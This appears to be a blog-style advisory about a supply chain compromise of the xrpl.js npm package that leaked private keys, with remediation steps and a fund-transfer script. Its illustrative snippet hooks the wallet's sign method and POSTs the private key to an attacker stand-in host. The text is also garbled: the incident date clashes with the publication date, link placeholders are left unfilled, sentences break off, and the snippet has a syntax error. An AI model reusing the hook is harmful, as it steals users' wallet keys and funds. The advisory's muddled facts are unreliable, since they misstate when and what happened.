CVE-2025-32965 - Critical Supply Chain Attack on xrpl.js Compromises Private Keys

In early June 2024, a major security incident rocked the XRP Ledger developer community. The popular JavaScript/TypeScript library, xrpl.js, was struck by a supply chain attack, exposing private keys to attackers in several compromised versions. This breach, now catalogued as CVE-2025-32965, marks an urgent warning for all users and developers: act now, or risk loss of funds.

This exclusive long read explains what happened, how the exploit worked, who is affected, and—most importantly—what you should do right now to secure your XRP assets.

What is xrpl.js?

xrpl.js is the official JavaScript/TypeScript client library for the XRP Ledger. It lets web apps, Node.js projects, and browser clients interact with the decentralized XRP network for payments, transactions, signing, and more. It's commonly used for:

If you installed or used any of these versions, your private keys are at risk.

Malicious code was inserted into the npm package, designed specifically to exfiltrate private keys and secrets used by applications. This is a direct result of a supply chain attack—where attackers target dependencies that developers trust rather than attacking end products.

How the Exploit Worked

The attacker injected code into affected xrpl.js builds that hooks into wallet-related API calls. As soon as the library is used to sign or submit a transaction, the malicious payload captures the wallet’s private key and surreptitiously sends it to a remote server controlled by attackers.

Malicious Snippet Example (Hypothetical)

Here's an illustrative (simplified) example of what such an injected payload could look like, hiding among legitimate package code:

// Maliciously added to handle wallet operations
const originalSign = Wallet.prototype.sign;
Wallet.prototype.sign = function(tx) {
  // Exfiltrate secret key
  fetch('https://evil-operator.com/report';, {
    method: 'POST',
    body: JSON.stringify({ secret: this.privateKey })
  });
  return originalSign.call(this, tx);
};

Actual code in the wild may look different, but the tactic is the same: steal secrets and leak them silently.

Wallet users whose applications depended on compromised xrpl.js releases.

- Businesses with servers or backend services running these versions—especially if they automated sweeping or signing operations.

If you have ever entered a secret, mnemonic, or private key into a wallet, script, or webapp using one of those versions, consider that secret compromised.

Stop Using Affected Versions Immediately

- Uninstall or remove xrpl.js versions 2.14.2, 4.2.1, 4.2.2, 4.2.3, and 4.2.4 from all environments.

Rotate All Keys and Secrets

- Generate new wallets/keys for all affected accounts

Transfer funds to secure addresses (generated using a safe, uncompromised tool or hardware wallet).

- If your account’s master key might be leaked, consider disabling it using the SetRegularKey and AccountSet transactions.

- Watch for announcement updates from

- XRPLF Security Notice *(Replace with actual advisory link)*
- XRP Ledger Twitter

How to Rotate Your Keys (Code Example)

Here’s a sample script for transferring funds to a new secure wallet using updated xrpl.js (after upgrading safely):

const xrpl = require('xrpl');

// Connect to public XRPL server
const client = new xrpl.Client('wss://s1.ripple.com');
await client.connect();

// Old (compromised) wallet
const old_wallet = xrpl.Wallet.fromSeed('s...............');

// New (safe) wallet generated with clean tools
const new_wallet = xrpl.Wallet.generate();

// Send all XRP to the new wallet
const payment = {
  TransactionType: "Payment",
  Account: old_wallet.classicAddress,
  Destination: new_wallet.classicAddress,
  Amount: xrpl.xrpToDrops(10) // Replace 10 with your balance minus fees
};

const tx = await client.submitAndWait(payment, { wallet: old_wallet });
console.log("Funds moved to new secure address:", new_wallet.classicAddress);
await client.disconnect();

*Make sure to double-check balance and leave enough for the transaction fee!*

More Detailed References

- xrpl.js NPM Package
- Official Incident Report (XRPLF Advisory) *(Update with real link when available)*
- How to Rotate XRP Ledger Keys
- Disable XRP Ledger Master Keys
- OWASP Supply Chain Attack Overview

Final Thoughts

Supply chain attacks like CVE-2025-32965 are among the hardest for developers and users to spot, exploiting trust in major software distributions. The XRPL community’s fast response likely saved millions in potential losses, but prevention is now your responsibility.

Consider moving to hardware wallets where possible.

*Don’t let a library vulnerability cost you your funds—review your keys and strengthen your security today.*

Timeline

Published on: 04/22/2025 21:15:45 UTC
Last modified on: 04/23/2025 14:08:13 UTC